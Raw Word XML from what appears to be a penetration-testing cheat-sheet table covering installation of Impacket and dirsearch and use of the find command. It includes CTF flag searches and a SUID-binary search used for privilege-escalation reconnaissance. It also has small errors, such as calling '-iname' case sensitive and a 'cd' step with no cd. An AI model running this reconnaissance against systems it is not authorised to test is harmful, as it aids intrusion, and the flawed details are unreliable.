              <w:t>If you need to download Impacket from GitHub, use this command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> git clone </w:t>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/SecureAuthCorp/impacket.git</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/impacket</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:t>This will cd to impacket’s folder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> pip3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00101D0E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D06FD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/opt/impacket/requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">This will use pip, a tool for installing and managing Python packages, inside of </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">impacket folder to install the packages. The </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-r </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">switch ensures install from the </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>requirements file.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> python3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">./setup.py </w:t>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:t>This will use python to install impacket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="240BC9AD" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6466F3C0" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5CA1FA38" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D091EA5" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="00D11F30" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D11F30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(There is more about dirsearch later on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71E973C9" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>If you need to download dirsearch from Kali Linux repositories, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00101D0E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00101D0E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get install </w:t>
            </w:r>
            <w:r w:rsidRPr="00101D0E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="16CCE2F1" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7344BBCD" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2EE58C07" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>find</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3739B964" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t xml:space="preserve">The find command works on a </w:t>
            </w:r>
            <w:r w:rsidRPr="008310FF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>where what</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7FA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>guideline.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Wildcard</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Search entire machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8A0ACB" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="004218FC" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type d</w:t>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Only find directories</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type f</w:t>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Only find files</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-name</w:t>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify a pattern</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0042640E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>iname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Case sensitive</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-user</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify a user</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-size</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify file size</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-perm</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify permissions with octal form or symbolic</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>All of these use min for minutes or time for days.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">They can take + for more than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ago, or - for less than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">x </w:t>
            </w:r>
            <w:r>
              <w:t>ago.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>a is accessed, m is modified and c is for status change.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-amin </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Specify files accessed more than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in minutes</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-atime +</w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Specify files  accessed more than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in days</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">min </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001D0D00">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Specify files modified more than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  in minutes</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> +</w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Specify files modified more than </w:t>
            </w:r>
            <w:r w:rsidRPr="00035283">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in days </w:t>
            </w:r>
            <w:r w:rsidRPr="0096357F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0096357F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0096357F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0 </w:t>
            </w:r>
            <w:r>
              <w:t>for 24 hrs)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If using a </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then it is also a good idea to use quotation marks around the characters you want included with the wildcard, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eg.</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-type f -name </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>*.xml</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="61969148" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4D2AFF2F" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="058C7A6E" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CC22724" w14:textId="31CF5AAE" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Here are a couple of useful find commands…</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/home </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type f -na</w:t>
            </w:r>
            <w:r w:rsidR="00393D16">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">e </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">user.txt    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-type d -name </w:t>
            </w:r>
            <w:r w:rsidRPr="002C6003">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="002C6003">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>*exploits</w:t>
            </w:r>
            <w:r w:rsidRPr="002C6003">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="004218FC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-type f -atime </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">-10 </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-name "</w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>*.png</w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00A87673">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-type f -mmin </w:t>
            </w:r>
            <w:r w:rsidRPr="002E7274">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>-120</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794184F5" w14:textId="1DC78A35" w:rsidR="00A87673" w:rsidRDefault="00A87673" w:rsidP="00834B5C">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-perm -u=</w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-type </w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A87673">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
